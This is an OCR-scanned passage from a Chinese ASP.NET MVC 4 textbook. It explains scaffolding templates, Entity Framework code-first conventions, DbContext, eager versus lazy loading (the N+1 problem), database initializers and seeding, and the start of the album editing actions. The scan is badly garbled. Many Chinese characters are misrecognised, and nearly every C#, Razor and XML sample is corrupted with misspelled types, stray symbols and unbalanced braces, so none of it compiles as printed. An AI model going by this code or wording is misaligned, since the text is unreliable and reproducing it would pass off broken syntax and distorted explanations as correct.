所 需 的 样板 代码 。 基 架 模 板 检测 模型 类 (如 刚才 创建 的 Album 类 ) 的 定义 ， 然 后 生成 控制 器 
以 及 与 该 控制 器 关联 的 视图 。 基 架 知道 如 何 命名 控制 器 、 命 名 视图 以 及 每 个 组 件 需 要 执行 
什么 代码 ， 也 知道 在 应 用 程序 中 如 何 放 置 这 些 项 以 使 应 用 程序 正常 工作 。 


基 架 选项 
像 MVC 框架 的 所 有 其 他 项 一 样 ， 如 果 不 喜 欢 默 认 的 基 架 ， 就 可 以 根据 自己 的 需要 自 
定义 基 架 或 替换 现 有 基 架 的 代码 生成 机 制 . 也 可 以 通过 NuGet( 搜 索 scaffolding) 查 拷 可 替代 
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的 基 架 模板 。NuGet 库 中 全 是 运用 特定 设计 模式 和 拉 术 来 生成 代码 的 基 架 。 
如 果 确 实 不 喜欢 基 架 ， 也 可 以 从 零 开始 手工 设计 所 有 内 容 。 基 架 对 于 创建 应 用 程序 来 
说 不 是 不 可 或 缺 的 ， 但 是 利用 基 架 会 为 应 用 程序 开发 节省 很 多 时 间 。 


虽然 不 要 期 望 基 架 能 够 创建 整个 应 用 程序 ， 但 是 基 架 可 以 让 开发 人 员 从 于 雄 党 杂 的 工 
作 中 解脱 出 来 ， 例 如 ， 基 架 可 以 代劳 在 正确 位 鸭 创 建文 件 的 操作 ， 避 人 饮 了 开发 人 员 完 全 手 
动 来 编写 程序 代码 。 可 以 调整 和 编辑 基 架 生成 的 代码 来 创建 自己 的 应 用 程序 。 基 架 只 有 在 
允许 运行 的 时 候 才 会 运行 ， 所 以 不 必 担 心 代码 生成 器 会 敌 新 对 输出 文件 的 修改 。 

MVC 4 中 包含 有 各 种 基 架 模板 。 不 同 基 架 模板 的 代 人 码 生 成 量 不 同 ， 所 以 选择 不 同 的 基 
架 模板 就 会 有 不 同 的 基 架 代码 生成 量 。 下 面 章节 中 介绍 一 些 常用 的 模板 。 

1. Empty Controller 


Empty Controller 模 板 会 同 Controllers 文件 夹 中 添加 一 个 县 有 指定 名 称 且 派生 上 自 Controller 
的 类 (控制 硕 )。 这 个 控制 右 市 有 的 唯一 操作 就 是 mdex 操作 ,， 且 在 其 内 部 除了 返回 一 个 默认 
ViewResult 实例 的 代码 之 外 ， 没 有 其 他 任何 代码 。 这 个 模板 不 会 生成 任何 视图 。 

2. Controller with Empty Read/Write Actions 


这 个 模板 会 回 项 目 中 添加 一 个 带 有 Index、Details、Create、Edit 和 Delete 操作 的 控制 
器 。 虽 然 控 制 占 内 部 的 操作 不 是 完全 空白 ， 但 不 会 执行 任何 有 实际 意义 的 操作 ， 除 非 同 其 
中 添加 目 己 的 代码 并 为 它们 创建 视图 。 

3.API Controller with Empty Read/Write Actions 


这 个 模 极 同 项 目 中 添加 了 一 个 继承 目 基 类 ApiController 的 控制 器 。 可 以 用 来 为 应 用 程 
序 创 建 Web API。 第 11 章 将 详细 介绍 Web API。 


4. Controller with Read/Write Actions and Views, Using Entlty Framework 


这 个 模板 就 是 下 面 将 要 选择 的 模板 , 因为 它 不 仅 生 成 了 带 有 整套 Index、Details、Create、 
Edit 和 Delete 操作 的 控制 器 及 其 需要 的 所 有 相关 视图 , 而 且 还 生成 了 与 数据 库 交 互 (持久 保 
存 数据 到 数据 库 或 从 数据 库 中 读 取 数据 ) 的 代码 。 

为 了 让 模板 产生 合适 的 代码 ， 需 要 选择 一 个 模型 类 (在 图 4-3 中 选择 的 是 Album 类 )。 
基 架 会 检测 所 选择 模型 的 所 有 属性 ， 然 后 利用 这 些 信 息 来 创建 控制 器 、 视 岁 和 数据 库 访问 
代码 。 

为 了 生成 数据 访问 代码 ， 基 架 需 要 一 个 数据 上 下 文 对 象 的 名 称 。 这 里 可 以 为 基 架 指定 

-个 现 有 的 数据 上 下 文 ,也 可 以 根据 需要 创建 一 个 新 的 数据 上 下 文 。 什 么 是 数据 上 下 文 呢 ? 

要 说 明 这 个 问题 ， 就 必须 首先 了 解 一 下 实体 框架 。 
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4.2.2 ” 基 架 和 实体 框架 


新 建 的 ASPNET MVC 4 项目 会 自动 包含 对 实体 框架 的 引用 。EF 是 一 个 对 象 关系 映射 
框架 ， 它 不 但 知道 如 何在 关系 型 数据 库 中 保存 .NET 对 象 ， 而 且 还 可 以 利用 LINQ 查询 语 
人 句 检 索 那 些 保存 在 关系 型 数据 库 中 的 .NET 对 象 。 


灵活 的 数据 选项 


如 果 不 想 在 ASPNET MVC 应 用 程序 中 使 用 实体 框架 ， 也 是 可 以 的 。 框 架 中 没有 强制 


要 求 与 EF 建立 依赖 关系 的 机 制 ， 也 没有 强制 必须 使 用 数据 库 (不 管 是 不 是 关系 型 的 数据 
库 )。 事 实 上 ， 可 以 使 用 任何 数据 访问 技术 或 数据 源 来 构建 应 用 程序 ， 比 如 ,使 用 用 逗号 分 
卫 的 文本 文件 或 者 采用 使 用 了 全 套 WS-* 协 议 组 件 的 Web 服务 。 

本 章 使 用 的 是 EF， 但 是 涉及 的 许多 主题 都 可 以 广泛 地 应 用 于 任何 数据 源 。 


EF 文 持 代 人 码 优 先 的 开发 风格 .代码 优先 是 指 可 以 在 不 创建 数据 库 模式 、 也 不 打开 Visual 
Studio 设计 器 的 情况 下 ， 回 SQL Server 中 存储 或 检索 信息 。 可 以 编写 纯 C# 类 ， 因 为 EF 知 
道 如 何 将 这 些 类 的 实例 存储 到 正确 位 置 。 

还 记得 模型 对 象 中 的 所 有 属性 都 是 虚拟 的 吗 ? 虚 拟 属 性 不 是 必需 的 ， 但 是 它们 给 EF 
提供 一 个 指向 纯 C# 类 集 的 钩子 hook)， 并 为 EF 启用 了 一 些 特性 ， 如 高 效 的 修改 跟踪 机 制 
(efficient change tracking mechanism)。EF 需要 知道 模型 属性 值 的 修改 时 刻 ， 因 为 它 要 在 这 

-时 刻 生 成 并 执行 一 个 SQL UPDATE 语句 ， 使 这 些 改变 和 数据 库 保 持 一 致 。 


谁 应 该 放 在 第 一 位 ， 代 码 还 是 数据 库 ? 


如 果 我 们 已 经 熟悉 了 实体 框架 ， 并 且 还 在 使 用 模型 优先 或 模式 优先 方法 进行 开发 ， 那 
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么 我 们 是 羊 运 的 ， 因 为 MVC 基 染 也 将 支持 这 样 做 。 实 体 框架 团队 设计 的 代码 优先 方案 为 
我 们 提供 了 无 障碍 的 环境 来 处 理 重复 的 编码 和 数据 库 工作 。 


1. 代码 优先 约定 


为 了 使 开发 生活 变 得 更 轻松 ，EF 像 ASPNET MVC 一 样 ， 遵照 了 很 多 约定 。 例 如 ， 如 
果 想 把 一 个 Album 类 型 的 对 象 存 储 在 数据 库 中 ， 那 么 EF 就 假设 是 把 数据 存储 在 数据 库 中 
个 名 为 Albums 的 表 中 ; 如 果 要 存储 的 对 象 中 有 一 个 名 为 IDD 的 属性 ，EF 就 假设 这 个 属 
性 值 就 是 主键 值 ， 并 把 这 个 值 赋 给 SQL Server 中 对 应 的 自动 递增 (标识 ) 键 列 。 
EF 对 于 外 键 关系、 数据 库 名 称 等 也 有 约定 。 这 些 约定 取代 了 以 前 需要 提供 给 一 个 关系 
对 象 映射 框架 的 所 有 映射 和 配置 。 当 从 头 开始 编写 应 用 程序 时 ， 代 码 优先 方法 会 发 挥 很 大 
的 作用 。 如 果 要 用 现 有 的 数据 库 ， 那么 宕 要 提供 映射 元 数据 (可 能 是 使 用 实体 框架 的 模式 优 
先 方法 开发 的 )。 如 果 想 更 多 地 了 解 实体 框架 ， 可 以 从 MSDN 上 的 Data Developer Center 入 
于 (http://msdn.microsoft.com/en-us/data/aa937723)。 
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2. DbContext 类 


当 使 用 EF 的 代码 优先 方法 时 , 需要 使 用 从 EF 的 DbContext 类 派生 出 的 一 个 类 来 访问 
数据 库 。 该 派生 类 具有 一 个 或 多 个 DbSet<T> 类 型 的 属性 ， 类 型 DbSet<T> 中 的 每 一 个 T 代 
表 一 个 想 要 持久 保存 的 对 象 。 例 如 ， 下 面 的 类 就 可 以 用 来 存储 和 检索 Album 和 Artist 的 
信息 : 

public class MuslcStoreDB : DbContext 

public Dbhset<Album> Albums { get; Set } 

public DhSet<Artist> Artists |{ get; set; |} 

} 

使 用 先前 的 数据 上 上 下文， 可 以 通过 使 用 LINQ 查询 ， 按 字母 顺序 检索 出 所 有 专辑 ， 代 
但 如 下 所 示 : 

Var db = new MusicSstoreDB(); 

Var allAlbums = from album ln db.Albums 


orderby album.Title ascending 
select album; 


现在 了 解 了 一 点 关于 内 置 基 架 模 板 的 技术 ， 下 面 将 继续 讲解 基 架 生成 代码 的 过 程 。 
选择 数据 访问 策略 


到 目前 为 止 ， 已 经 出 现 有 很 多 种 不 同 的 数据 访问 方法 ， 并 且 方 法 的 选用 不 仅 依赖 于 所 


要 创建 的 应 用 程序 类 型 , 而 且 也 依赖 于 开发 人 员 的 个 性 (或 者 说 开发 团队 的 个 性 )。 事实 上 ， 
没有 一 种 数据 访问 策略 适用 于 所 有 应 用 程序 和 所 有 开发 团队 。 

本 章 中 的 方法 使 用 Visual Studio 开发 工具 ， 以 便 快速 局 动 和 运行 应 用 程序 。 这 样 做 对 
于 代码 没有 什么 明显 的 错误 ; 然而 ， 对 于 一 些 开发 人 员 和 项 目 ， 这 种 方法 就 太 简 单 了 。 本 
章 中 使 用 的 基 架 假设 我 们 创建 的 应 用 程序 再 要 实现 基本 的 create 、read、update 和 
delete(CRUD) 功 能 。 现 有 的 很 多 应 用 程序 只 提供 CRUD 功能 和 基本 的 验证 功能 ， 以 及 少量 
的 工作 流程 和 业务 规则 。 对 于 这 样 的 应 用 程序 ， 基 架 能 发 挥 很 好 的 作用 。 

对 于 更 复杂 的 应 用 程序 ， 我 们 想 探讨 不 同 的 架构 和 设计 模式 来 满足 我 们 的 需求 。 领 域 
驱动 设计 (Domain-driven design，DDD) 是 一 种 团队 使 用 的 方法 ， 可 用 来 处 理 复杂 的 应 用 程 
序 。 命 令 查 询 职 责 分 离 (Command-query responsibility segregation，CQRS) 也 是 一 种 团队 开 
发 模式 ， 它 在 复杂 的 应 用 程序 开发 中 占有 主要 份额 。 

DDD 和 CQRS 中 使 用 的 流行 设计 模式 包 插 库 和 工作 单元 设计 模式 。 如 果 想 更 多 地 了 
解 这 些 设计 模式 ， 可 参阅 http://msdn.microsoft.com/en-us/library/ff714955.aspx。 库 设计 模式 
的 优势 之 一 ， 我 们 可 在 数据 访问 代码 和 程序 其 他 部 分 之 间 创 建 一 个 正 间 边界 。 这 个 边界 可 
以 提高 代码 单元 测试 的 能 力 ， 这 不 是 默认 基 架 生成 代码 的 优势 之 一 ， 因 为 便 编 码 依赖 于 实 
体 框架 。 
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4.2.3 执行 基 架 模板 

回 到 Add Controller 对 话 框 中 (参见 图 4-3)， 选 择 Data context class 下 面 的 下 拉 列 表 并 
选中 <New Data Context... > 项 。 接 下 来 会 弹出 New Data Context 对 话 框 ， 如 图 4-4 所 示 ， 在 
箱 入 框 中 输入 用 来 访问 数据 库 的 类 名 (包括 和 它 的 名 称 空 间 )。 


RE 
New Data Context 


| New data context type: 
Mhrehdusic tore. Models. MusicStoreDBContext 


将 数据 上 下 文 全 名 为 MusicStoreDB ， 单 击 OK 按钮 ， 这 样 就 完成 了 Add Controller 对 
话 框 (如 图 4-5 所 示 ) 的 设置 。 这 就 为 Album 类 的 一 个 控制 器 StoreManagerController 及 其 相 
关 视 图 构建 了 基 架 。 


Controller name: 
toreManagerController 
Scaffolding options 
Template: 
MYC controller with read/write actions and wews using Entity Framework 
Model class: 
Album 


Data context class: 


Razor (CSHTML) 


4-5 

单 击 Add 按钮 后 ， 基 架 将 在 项 目的 多 个 位 置 添加 新 文件 。 在 继续 回 前 讲解 之 前 ， 下 面 
首先 探讨 这 些 新 文件 。 

1. 数据 上 下 文 

基 架 会 在 项 目的 Models 文件 夹 中 添加 MusicStoreDB.cs 文件 。 文 件 中 的 类 继承 了 实体 
框架 的 DbContext 类 ， 可 以 用 来 访问 数据 库 中 的 专辑 、 流 派 和 艺术 家 人 信息。 尽管 只 告知 了 
基 架 Album 类 ， 但 是 它 看 到 了 相关 的 模型 并 把 它们 也 包含 在 了 上 下 文中 。 

public class MusicSstoreDB : DbContext 


{ 
public Dbset<Album> Albums 1{ get set; } 
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public Dbhset<Genre> Genres { get Set |} 


public Dbset<Artist> Artists 1{ get; set; | 
} 
想 要 访问 数据 库 ， 只 需要 实例 化 这 个 数据 上 下 文 类 。 现 在 可 能 极 想 知道 上 下 文 要 使 用 
什么 样 的 数据 库 ， 这 个 问题 将 在 后 面 运行 程序 时 给 出 回答 。 


2. StoreManagerController 


选择 的 基 架 模板 也 会 生成 StoreManagerController 类 ， 并 将 其 放 在 应 用 程序 的 Controllers 
文件 夹 下 。 这 个 控制 融 拥 有 选择 和 编辑 专辑 信息 所 需 的 所 有 代码 。 下 和 耐 是 该 类 定义 的 前 
几 行 代码 : 
public class StoreManagerController : Controller 
{ 
private MusicSstoreDB db = new MuslcStoreDB () : 


// 
// GET: /StoreManager/ 


public ViewResult Index () 

| 
var albums = db.Albums.Include(a => a.Genre) .Include(a => a.Artist)}); 
return Viewl(albums.ToList())});} 


} 
// more later ... 

在 这 段 代 码 的 前 面部 分 ,会 看 到 基 架 为 控制 器 添加 了 一 个 MusicStoreDB 类 型 的 私有 子 
段 。 由 于 控制 器 中 的 每 个 操作 都 要 访问 数据 库 ， 因 此 基 架 用 一 个 新 的 数据 上 下 文 实例 来 初 
始 化 这 个 字段 。 在 Index 操作 中 ， 可 以 看 到 这 样 的 代码 ， 它 使 用 上 下 文 将 数据 库 中 的 所 有 
专辑 加 载 到 一 个 列表 中 ， 并 将 列表 作为 模型 传递 给 默认 视图 。 

加 载 相 关 对 象 

在 Index 操作 中 Include 方法 的 调用 告知 实体 框架 在 加 载 一 个 专辑 的 相关 流派 和 艺术 家 
信息 时 采用 预 加 载 策略 。 预 加 载 策略 就 尽 其 所 能 地 使 用 查询 语句 加 载 所 有 数据 。 

实体 框架 的 另 一 种 (默认 的 ) 策 略 是 延迟 加 载 策略 。 使 用 延迟 加 载 策略 ，EF 在 LINQ 碍 
询 中 只 加 载 主 要 对 象 (专辑 ) 的 数据 ， 而 不 填充 Genre 和 Artist 属性 : 


Var albums = db.Albums:; 


延迟 加 载 根据 需要 来 加 载 相关 数据 ， 也 就 是 说 ， 本 Album 的 (renre 或 Artist 
属性 时 ，EF 才 会 通过 向 数据 库 发 送 一 个 额外 的 合 询 来 加 载 这 些 数据 。 然 而 不 巧 的 是 ， 当 处 
理 专 辑 信 息 时 ， 延 迟 加 载 策略 会 强制 框架 为 列表 中 的 每 一 个 专辑 向 数据 库 发 送 一 个 额外 的 
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得 询 。 对 于 含有 100 个 专辑 的 列表 , 如 果 要 加 载 所 有 的 艺术 家 数据 延迟 加 载 则 总 共和 再 要 101 
个 查询 。 这 里 描述 的 情形 就 是 N+1 问题 (因为 框架 要 执行 101 个 查询 才能 得 到 100 个 填充 
了 的 对 象 )， 这 是 使 用 对 象 关系 映射 框架 面临 的 一 个 共同 问题 。 看 来 延迟 加 载 在 市 来 便利 的 
同时 可 能 也 要 付出 潜在 的 代价 。 

这 里 可 将 Include 方法 看 成 减少 在 构建 完整 模型 中 需要 的 查询 数量 的 一 个 优化 。 如 果 
想 更 多 地 了 解 延迟 加 载 , 请 参阅 MSDN 上 的 “Loading Related Objects” 网 址 为 http://msdn. 
microsotft.com/library/bb896272.aspx。 


基 架 也 生成 用 来 创建 、 编 辑 、 删 除 和 展示 专辑 信息 的 操作 。 要 了 解 详情 ， 请 仔细 阅读 
章 后 面 将 介绍 的 编辑 功能 背后 所 涉及 的 操作 。 
3. 视图 


一 旦 基 架 运行 完成 ， 就 将 在 新 的 视图 文件 夹 Views/StoreManager 下 出 现 一 个 视图 集 。 
这 些 视图 为 用 户 界面 提供 了 罗列 、 编 辑 和 删除 专辑 的 功能 ， 如 图 4-6 所 示 。 


A -OO 国 国 “ 


| Search Solution Explorer (Ctrts:) Fe 


m] Sclution ‘MveMusicStore' (2 projects) 
a Bj] MvcMusicStore 
b pp Properies 
b mm References 
i App_Data 
ml App_start 
加 Content 
国 Controllers 
天 Images 
I Models 
天 Scripts 
全 | Views 
b 国 Account 
b Home 
b mm Shared 
ET 
[B®] Create,cshtml 
[E] Delete,cshtrl 
[a] Details.cshtml 
IE] Edrt,cshtml 
[EE) Indexcshtml 
[8] ViewStart.cshtml 
风 Web.config 
[a favicon.ico 


图 4-6 


Index 视图 拥有 显示 音乐 专辑 表 所 需 的 所 有 代码 。 视 图 的 模型 是 Album 对 象 的 枚 举 序 
列 ， 正 如 先前 在 Index 操作 中 看 到 的 ，Album 对 象 的 枚 举 序列 正 是 Index 操作 传递 的 内 容 。 
视图 利用 这 个 模型 结合 使 用 foreach 循环 来 创建 显示 专辑 信息 的 HIML 表 : 


Qlmodel IEnumerable<MvycMusicSstore.Models.Album> 


记 


@{ 
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ViewBag.Title = "Index"; 
} 


<h2>Index</h2> 


<p> 
QHtm] .ActionLink ("Create New", "Create™) 
</p> 
<table> 
<tr> 
<th>@Html .DisplayNameFor (model => model .Genre.Name) </th> 
<th>@Html .DisplayNameFor (model => model.Artist.Name)</th> 
<th>Q@Html .DisplayNameFor (model => model] .Title)</th> 
<th>@Html .DisplayNameFor (model => model.Price)</th> 
<th>@Html .DisplayNameFor (model => model .AlbumArtUrl1)</th> 
<th></th> 
</tr> 


Qforeach (var item in Model) { 
<tIr> 

<td>@Html .DisplayFor (modelItem => item.Genre.Name)</td> 

<td>@Html .DisplayFor (modelItem => item.Artist.Name)</td> 

<td>@Html .DisplayFor (modelItem => item.Title)</td> 

<td>@Html .DisplayFor (modelItem => item.Price)</td> 

<td>@Html .DisplayFor (modelItem => item.AlbumArtUrl)</td> 

<td> 
QHtml .ActionLink ("Edit™, “Edit", new { id=item.AlbumId }) | 
QHtml .ActionLink ("Details™", "Details", new { id=item.AlbumId }) | 
QHtml .ActionLink ("Delete™", "Delete™", new { id=item.AlbumId }) 


</td> 
</tr> 
} 
</table> 


注意 基 架 是 如 何 选择 所 有 “重要 的 ”字段 显示 给 用 户 的 。 换 句 话 说， 视图 中 的 表 没 有 
显示 任何 外 键 属性 的 值 (因为 它们 对 用 户 来 说 是 无 意义 的 )， 但 显示 了 相关 的 流派 名 称 和 艺 
术 家 的 姓名 ， 这 是 如 何 实 现 的 呢 ?” 原 来 视图 对 所 有 的 模型 输出 都 采用 了 HTML 辅助 方法 


DisplayFor。 
表 中 的 每 一 行 还 包括 编辑 、 删 除 和 详细 显示 专辑 的 链接 。 正 如 前 面 提 到 的 ， 我 们 上 所 看 
到 的 基 架 代码 只 是 一 个 起 点 。 接 下 来 还 可 能 需要 添加 、 删 除 和 改变 一 些 代 码 来 按照 目 己 的 


规格 调整 视图 。 但 在 修改 以 前 ， 应 该 运行 一 下 视图 ， 查 看 当前 视图 的 效果 。 
4.2.4 ”执行 基 架 代码 


在 开始 运行 程序 之 前 ， 首 先 人 处理 一 个 本 章 前 面 提 到 的 吸 待 解决 的 问题 。MusicStoreDB 
采用 什么 数据 库 ? 到 目前 为 止 尚未 为 应 用 程序 创建 数据 库 ， 甚 至 尚未 指定 数据 库 连 接 。 
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1. 用 实体 框架 创建 数据 库 


EF 的 代 伺 优先 的 方法 会 尽 可 能 地 使 用 约定 而 非 配 置 。 如 果 不 配置 从 模型 到 数据 库 中 表 
和 列 的 具体 映射 ，EF 将 使 用 约定 创建 一 个 数据 库 模式 。 如 来 在 运行 时 不 配置 一 个 具体 的 数 
据 库 连 接 ，EF 将 按照 约定 创建 一 个 连接 。 


配置 连接 
显 式 地 为 代码 优先 数据 上 下 文 配置 连接 很 简单 ， 即 同 web.config 文件 中 添加 一 个 连接 
字符 串 。 该 连接 字符 串 的 名 称 必 须 与 数据 上 下 文 类 的 名 称 一 致 。 在 已 经 编写 的 代码 中 可 以 
通过 使 用 以 下 的 连接 字符 串 来 控制 上 下 文 的 数据 库 连接 : 
<Connectionstrings> 
<add name="MuslicstoreDB" 
connectionstring="data source=. \SQLEXPRESS; 
Integrated Security=SSPI; 
initijial catalog=MusicStore™ 
providerName="System.Data.SsSqlClient™ /> 
</connectionstrings> 
如 果 不 配置 具体 的 连接 ，EF 将 尝试 连接 SQL Server Express 的 本 地 实例 ， 并 且 查 找 与 
DbContext 派生 类 同名 的 数据 库 。 如 果 EF 能 够 连接 到 数据 库 服务 融 ， 但 找 不 到 数据 库 ， 那 
么 框架 将 会 创建 一 个 数据 库 。 如 果 在 基 架 完成 后 ， 运 行 应 用 程序 ， 并 导航 到 URL 连接 
/StoreManager， 我 们 会 发 现实 体 框架 已 经 在 本 机 的 SQL Express 实例 中 创建 了 一 个 名 为 Mvc 
MusicStore.Models.MusicStoreDB 的 数据 库 。 如 果 想 看 新 数据 库 的 完整 图 表 ， 请 参见 图 4-7。 


EdmMetadata 
ld 
ModelHash 
Artists 
Albums bo Ee 
© abumid Name 
到 fi 全 
ri 
Titile 
i Genres 
| | 9 Genreld 
Name 
Leacripgtion 


图 4-7 


实体 框架 自动 创建 数据 库 表 来 存储 专辑 、 艺 术 家 和 流派 的 信息 。 框 架 使 用 模型 属性 的 
名 称 和 数据 类 型 来 决定 数据 库 表 中 列 的 名 称 和 数据 类 型 。 这 里 ， 注 意 框 架 是 如 何 推导 出 每 
个 表 的 主键 列 ， 以 及 各 表 之 间 的 外 键 关系 。 

数据 库 中 的 EdmMetadata 表 是 EF 用 来 确保 模型 类 和 数据 库 模式 同步 的 (通过 从 模型 类 
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定义 中 计算 一 个 哈 希 值 )。 如 果 修 改 模型 ， 例 如 添加 一 个 属性 、 删 除 一 个 属性 或 者 添加 一 个 
类 等 ， 那 么 EF 要 不 就 是 根据 新 模型 重新 创建 数据 库 ， 要 不 就 是 抛 出 一 个 异常 。 不 过 不 必 
担心 ， 在 没有 许可 的 情况 下 ，EF 不 会 重新 创建 数据 库 ; 如 果 要 重新 创建 数据 库 ， 我 们 还 需 
要 提供 一 个 数据 库 的 初始 化 器 。 


EDMMETADATA 


EF 不 要 求 数据 库 中 必须 有 EdmMetadata 表 。 该 表 之 所 以 存在 ， 是 因为 EF 要 用 它 来 检 


测 模型 类 的 变化 。 可 以 放心 地 从 数据 库 中 删除 EdmMetadata 表 ， 此 时 实体 框架 假设 我 们 知 
道 自 己 在 做 什么 。 一 旦 删除 了 EdmMetadata 表 , DBA 就 要 负责 使 数据 库 中 模式 的 改变 匹配 
模型 中 的 改变 。 当 然 也 可 以 通过 改变 模型 和 数据 库 之 间 的 映射 来 使 其 继续 工作 。 详 细 情 识 
请 参见 http://msdn.microsoft.conylibrary/gg696169(VS.103).aspx， 可 以 将 其 作为 映射 和 注释 


2. 使 用 数据 库 初 始 化 器 


保持 数据 库 和 模型 变化 同步 的 一 个 简单 方法 是 允许 实体 框架 重新 创建 一 个 现 有 的 数 
据 库 。 可 以 告知 EF 在 应 用 程序 每 次 局 动 时 重新 创建 数据 库 或 者 仅 当 检测 到 模型 变化 时 重 
建 数据 库 。 当 调用 EF 的 Database 类 (在 名 称 空间 System.Data.Entity 中 ) 中 的 静态 方法 
SetInitializer 时 ， 可 以 选择 这 两 种 策略 中 的 任意 一 个 。 

当 使 用 Setmitializer 方法 时 ,需要 问 其 传递 一 个 IDatabaselInitializer 对 象 ， 而 框架 中 市 有 两 
个 IDatabaseInitializer 对 象 : DropCreateDatabaseAlways 和 DropCreateDatabaselfModelChanges。 
可 以 根据 这 两 个 类 的 名 称 来 辨别 每 个 类 所 代表 的 策略 。 两 个 初始 化 右 都 震 要 一 个 泛 型 类 型 
的 参数 ， 并 且 这 个 参数 必须 是 DbContext 的 派生 类 。 

例如 ， 假 设想 要 在 应 用 程序 每 次 重新 启动 时 都 重新 创建 音乐 商店 的 数据 库 。 那 么 在 文 
件 global.asax.cs 内 部 ， 可 在 应 用 程序 启动 过 程 中 设置 一 个 初始 化 器 : 


protected void Application Start (| 


{ 
Database.SetInitializer (new 
DropCreateDatabaseAlways<MusicstoreDB> ()).， 
AreaRegistration.RegisterAllAreas (}; 
ReglisterGlobalFilters (GlobalFilters.Filters),; 
RegisterRoutes (RouteTable.Routes); 
} 


现在 可 能 极 想 知道 为 什么 有 人 想 在 每 次 应 用 程序 重新 启动 时 都 要 重新 创建 数据 库 ， 尽 
管 模型 改变 了 ， 但 是 难道 不 想 保 留 其 中 的 数据 吗 ? 

这 些 都 是 很 合理 的 问题 。 必 须 记 住 ， 代 码 优先 方法 (如 数据 库 的 初始 化 器 ) 的 特征 是 为 
应 用 程序 生命 周期 早期 阶段 的 迭代 和 快速 变化 提供 便利 的 。 一 旦 发 布 一 个 实际 网 站 并 且 采 
用 真实 的 客户 数据 ， 就 不 能 在 每 次 改变 模型 时 重新 创建 数据 库 了 。 
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迁移 

实体 框架 的 4.3 版 本 包括 很 多 功能 ， 例 如 挖掘 模型 对 象 的 变化 ， 以 及 为 SQL Server 生 
成 变更 指令 。 当 创建 和 完善 模型 定义 时 ， 迁 移 (migrations) 可 以 帮助 我 们 保留 数据 库 中 的 已 
有 数据 。 更 多 信息 请 参阅 http://blogs.msdn.com/b/adonet/archive/2012/02/09/ef-4-3-code- 
based-mierationswalkthroueh.aspx. 

在 项 目的 最 初 阶段 ， 我 们 创建 的 数据 库 可 能 需要 填充 一 些 初 始 记 录 ， 像 得 找 值 。 我 们 
可 以 通过 下 节 介 绍 的 播种 数据 库 (seeding the database) 来 实现 。 


3. 播种 数据 库 


对 于 MVC Music Store 的 开发 ， 现 在 假设 将 项 目 设置 为 在 每 次 应 用 程序 重启 时 重新 创 
建 数据 库 。 然 而 ， 想 让 新 创建 的 数据 库 中 带 有 一 些 流 派 、 艺 术 家 甚至 一 些 专辑 ， 以 便 在 开 
发 应 用 程序 时 不 必 输 入 数据 就 可 以 使 其 进入 可 用 状态 。 

在 这 样 的 情形 下 ， 可 以 创建 一 个 DropCreateDatabaseAlways 类 的 派生 类 并 重 写 其 中 的 
Seed 方法 。Seed 方法 可 以 为 应 用 程序 创建 一 些 初始 的 数据 ， 正 如 在 下 面 的 代码 中 看 到 的 : 


Public class MusicStoreDbIlInitializer 
: DropCreateDatabaseAlways<MusicstoreDB> 


{ 
protected override Vold Seed (MusicstoreDB context) 
| 
context.Artists.Add (new Artjist {Name = "Al Di Meolja™})}); 
context .Genres.Add (new Genre { Name = "Jazz™ }):; 
context.Albums.Add (new Album 
{ 
Artist = new Artist { Name="Rush"™ }, 
Genre = new Genre 1{ Name="Rock"” 上 ， 
Price = 9.99m, 
Title = "Caravan" 
}); 
base.Seed (context);} 
} 
} 


调用 重 写 的 基 类 的 Seed 方法 会 将 新 对 象 保存 到 数据 库 中 。 这 时 在 音乐 商店 数据 库 的 每 
-个 实例 中 都 会 有 两 种 流派 (Jazz 和 Rockg]、 两 个 艺术 家 (Al Di Meola 和 Rush) 和 一 个 专辑 。 
想 让 新 的 数据 库 初 始 化 器 起 作用 ， 就 需要 在 应 用 程序 局 动 代码 部 分 注册 这 个 初始 化 顷 ， 如 
下 所 示 : 
protected void Application start () 


{ 


Database.SetInitializer(new MusijcSstoreDbInitializer()).: 
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AreaReglistration.ReglisterAllAreas () / 
RegisterGlobalFilters (GlobalFilters.Filters); 
RegisterRoutes (RouteTable.Routes)}); 
} 
如果 现在 重启 并 运行 应 用 程序 ， 在 浏览 颖 中 导航 到 /StoreManager URL， 将 看 到 存储 管 
理 需 中 Index 视图 的 运行 效 末 ， 如 果 4-8 所 未 。 


http://localhost S21 OD = BG) inder- MyASPNETMVYCA.. x | 


Fe Eo 
Ln 


Index 


(reate New 


Name Name Title Price AlbumArtUrl 
Rock Rush Earavan 伟人 9 Edrt | Detals | elete 


E202 = My ASP MET MA Appllc stion 


图 4-8 


图 4-8 所 示 就 是 一 个 带 有 真正 功能 和 真实 数据 的 程序 的 运行 效果 ! 

虽然 它 看 起 来 似乎 有 很 多 的 工作 ， 到 目前 为 止 在 理解 生成 代码 和 实体 框架 上 占用 了 大 
部 分 章节 篇 幅 ， 但 是 一 旦 知道 了 基 架 能 够 做 的 工作 ， 那 么 实际 的 工作 量 是 非常 小 的 ， 仅 
需要 三 步 : 

(1) 实现 模型 类 。 

(2) 为 控制 器 和 视图 构建 基 架 。 

(3) 选择 数据 库 初 始 化 策略 。 

要 记 住 ， 基 架 只 是 为 应 用 程序 的 特定 部 分 提供 了 一 个 起 点 ， 在 此 基础 上 可 以 自由 地 调 
整 和 修改 生成 的 代码 。 例如, 我 们 可 能 喜欢 (或 不 喜欢 ) 每 个 专辑 行 右边 的 连接 (Edit、 Details、 
Delete)， 如 果 不 喜 欢 这 些 连接 的 话 ， 就 可 以 将 其 从 视图 中 自由 地 删除 。 然 而 ， 本 章 接 下 来 
要 做 的 就 是 在 编辑 场景 下 ， 看 看 ASPNET MVC 是 如 何 更 新 视图 模型 的 。 


4.3 ”编辑 专辑 

基 架 将 要 处 理 的 情形 之 一 束 是 编辑 专辑 。 该 情形 是 从 用 户 通过 单 击 mdex 视图 中 的 Edit 
链接 ( 见 图 4-8) 开 始 的 。 编 辑 链接 同 Web 服务 器 发 送 一 个 市 有 URL 的 HTTP GET 请 求 ， 如 
URL 为 /StoreManager/Edit/8， 其 中 8 表示 特定 专辑 的 ID 属性 值 。 可 以 将 发 送 的 这 个 请 求 


看 成 “给 我 一 些 编 辑 专 辑 8 的 项 ” 
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4.3.1 


创建 编辑 专辑 的 资源 


默认 的 MVC 路 由 规则 是 将 HITP GET 请求 中 的 /StoreManager/Edit/8 传递 到 StoreManager 
控制 右 的 Edit 操作 中 ， 代 人 码 如 下 所 示 : 


/7 


/ GET: /StoreManager/Edit/8 


public ActionResult Edit (int id = 0) 


{ 


} 


Album allbum = db.Albums.Find(id); 

if (album == null) 

{ 

return HttpNotFound(); 

} 

